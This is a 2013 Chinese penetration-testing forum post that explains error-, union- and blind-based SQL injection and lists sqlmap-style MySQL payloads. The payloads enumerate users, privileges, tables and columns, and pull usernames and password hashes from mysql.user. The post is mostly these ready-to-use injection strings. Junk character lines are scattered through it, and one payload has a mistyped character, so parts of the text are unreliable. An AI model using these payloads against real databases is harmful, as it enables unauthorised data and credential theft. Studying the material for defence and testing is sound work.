中国网络渗透测试联盟
标题:
sqlmap高级注入
[打印本页]
作者:
admin
时间:
2013-7-16 20:31
标题:
sqlmap高级注入
放假第一天,本应该好好放松一下,可是还是想着把文章写完先。。。
9 v3 [7 g( T# `4 H& Y4 i
. [$ Y! N7 B* L0 i1 M+ h
这次的主题是高级注入,坛子里也讲到了一些,不过本文旨在给大家一个更深刻的概念和全面的理解,下面看看我自己列的一个表
# f' g3 X7 Y- d4 f
# `' ~2 T& c" O3 j) P ^& r* R
分类标准 分类 备注
% b" W7 d; Y1 ]4 y* ]
按字段类型 整型注入,字符型注入
8 s; c) y) T: r' G" u
按出现的位置 get注入,post注入,cookie注入,http header注入
# h6 \4 k3 c O6 |1 y
然而高级注入是这样的
" L0 ~1 x( e" k7 g
" [6 @& P" q* E7 u6 Q
高级注入分类 条件
G( E% F# e: M. A" D" C8 r4 C- L6 K
error-based sql 数据库的错误回显可以返回,存在数据库,表结构
5 a$ f" K7 y+ [ K) n
union-based sql 能够使用union,存在数据库,表结构
; X% Y. U' e" B* \) _
blind sql 存在注入
1 l, T' r/ c1 \
我们暂且不考虑waf等的影响,只从原理上学习。通过上面我们不难发现,三种高级注入选择的顺序应该是eub(第一个字母,后面为了方便我都这样表示了 ),实际上,e是不需要知道字段数的,u需要知道字段数,e之所以在前我觉得主要是因为这个,因为在其他方面它们没有本质的区别,它们都需要知道数据库以及表的结构,这样才能构造出相应的语句,当然,能e一般能u(没过滤union等),反过来却很不一定,因为一般会有自定义的错误提醒。如果没有结构,那么就回到了最悲剧,最麻烦的b了,猜。。。当然可能没有结果,但是如果只是不能使用u,有结构,b还是能出结果的,只是苦逼点而已。。。
$ Y- P9 q D( N9 l
( E A& L! a6 h2 J$ s
好了,说了这么多,该上神器sqlmap了,最近坛子里貌似很火
/ W' h& v9 L3 W: s
7 w$ t# P) U9 {9 x/ M6 g
附件分别以mysql和mssql为例子,提醒:sqlmap中使用-v 3可以查看每个请求的payload。
7 f1 h3 P7 u7 g
+ `& P3 d* B! F. f( e( t4 b
这里用mysql说明
! X# N g7 D& K- `# \9 T4 `% `
- E) S% u/ z1 Z$ z# [) ~
e注入坛子里很多了,请看戳我或者再戳我
7 g* Z: w7 I/ V% J. E
( L, @ w K& }9 d
u注入其实也很多了,这里就大概帖上一些重要语句吧,附件上结合例子都有的
$ Z, P% |" ]! J) d/ q
$ y+ h: z8 f8 s. d7 D2 d+ `
获取当前数据库用户名
7 @$ D6 X1 O/ `' u r
/ V. r5 |0 O# Q; t9 ?) d
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(C
% U9 h# e* e) v( D
AST(CURRENT_USER() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NUL
, l; P* d. h0 p
L, NULL#
|; _" r8 H9 I* X( O+ i
注意concat那里不是必须的,只是sqlmap为了自动攫取出数据加上的特征,下面语句类似,涉及基础性的知识,基友们自己去补吧。
. S" ]. ~) s: n$ l. o/ [ ^
* f [+ u7 u) B0 \/ r
获取数据库名
' X* z/ U. U5 q0 i! c' u2 j
- ~' e& n: b5 z% P) r
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(DATABASE() AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#
$ l# m0 s: Q+ i6 h) \
获取所有用户名
/ R1 z2 c6 {4 @. y4 N2 K
8 W7 V. k8 S2 ?3 @6 [) b5 t
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
, X1 m, y) b$ g, O
查看当前用户权限
; n9 V- N e. M
% J6 [ L, q ]1 s" @$ P7 g# U2 s
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(grantee AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(privilege_type AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#
/ H8 ^5 Y: N' S7 P
尝试获取密码,当然需要有能读mysql数据库的权限
& y; y7 d; Z5 r; K( V
) Y, ^2 \) S# n# ~& K4 @6 k3 ?
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(user AS CHAR),0x20),0x697461626a6e,IFNULL(CAST(password AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM mysql.user#
% h( B4 v& z8 d7 p
获取表名,limit什么的自己搞啦
- B- ~2 w4 N; C3 H& h
' \ y; b. v2 M* A% r. t
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(table_name AS CHAR),0x20),0x3a6864623a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.TABLES WHERE table_schema = 0x7061727474696d655f6a6f62#
0 d/ z& e6 e5 h1 h& U
获取字段名及其类型
; o, v' k: s' N; i0 J
UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a7075713a,IFNULL(CAST(column_name AS CHAR),0×20),0x697461626a6e,IFNULL(CAST(column_type AS CHAR),0×20),0x3a6864623a),NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x61646d696e5f7461626c65 AND table_schema=0x7061727474696d655f6a6f62 AND (column_name=0x61646d696e6e616d65 OR column_name=0x70617373776f7264)#
. t& S8 Q: B: u1 N+ P
[; f# u/ X8 x0 i. x/ e* A
b注入,呵呵,除了当前用户,数据库,版本可以出来,而如果不能u,但存在数据的结构表,还是能苦逼出来,否则猜也不一定能猜到表和字段,内容自然也出不来,苦逼access啊。。。
" H- v9 a; H b: {
6 V6 R0 t3 E3 M. U; I4 E) B
如:
: I& F( Z. v" x+ ^1 Q
获取当前用户名
. p4 J( C H! D7 B T) D' j r6 h% h
]4 S' d T- l0 _
AND ORD(MID((IFNULL(CAST(CURRENT_USER() AS CHAR),0x20)),1,1)) > 116
* J% R. I9 D* S" F( A
获取当前数据库
1 h) x6 j6 o' M( c
4 D0 S8 c$ j+ V7 b( d
AND ORD(MID((IFNULL(CAST(DATABASE() AS CHAR),0x20)),6,1)) > 106
1 O: C- H5 T0 H0 A- `) k
获取表名
' @: V6 O# K2 R9 W/ s
! S* E- V' C$ {; S7 @/ t, ?: n
AND ORD(MID((SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema=0x7061727474696d655f6a6f62),1,1)) > 51
! l: V9 y1 v% J* X. s" f' [
获取字段名及其类型和爆内容就不说了,改改上面的就可以了。
& n3 g0 u/ m& m; a" [6 d
回到最苦逼的情况,无结构的,mysql版本<5.0,现在不多见了吧,还是看看语句。
2 t( q7 S9 [& ^3 t; g( {# L
爆表
( e' D3 B' P1 S$ f. x, b
5 _: Y, I! Q9 G3 G( s) S1 E$ v# {
AND EXISTS(select * from table)
' ~5 l+ {9 H% E" p8 F% f3 Q) z2 i
爆字段
, e) }$ t! x: f( V
y# y$ s' { \* n: D7 k& f2 j
AND EXISTS(select pwd from table)
7 h' S6 k X. _* ?4 I. N
盲注的变化就比较多了,由于篇幅,只是举个例子而已。
* S* _6 g K# @6 w6 U8 ]1 Q
6 z! g6 R% P% [. a* ~- A! z
本来想把mssql和access都写上的,不过编辑得太累了,有时间再写吧,其实原理都差不多,今天就洗洗睡了吧。
- H3 G# p, l# `9 W8 h9 a
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2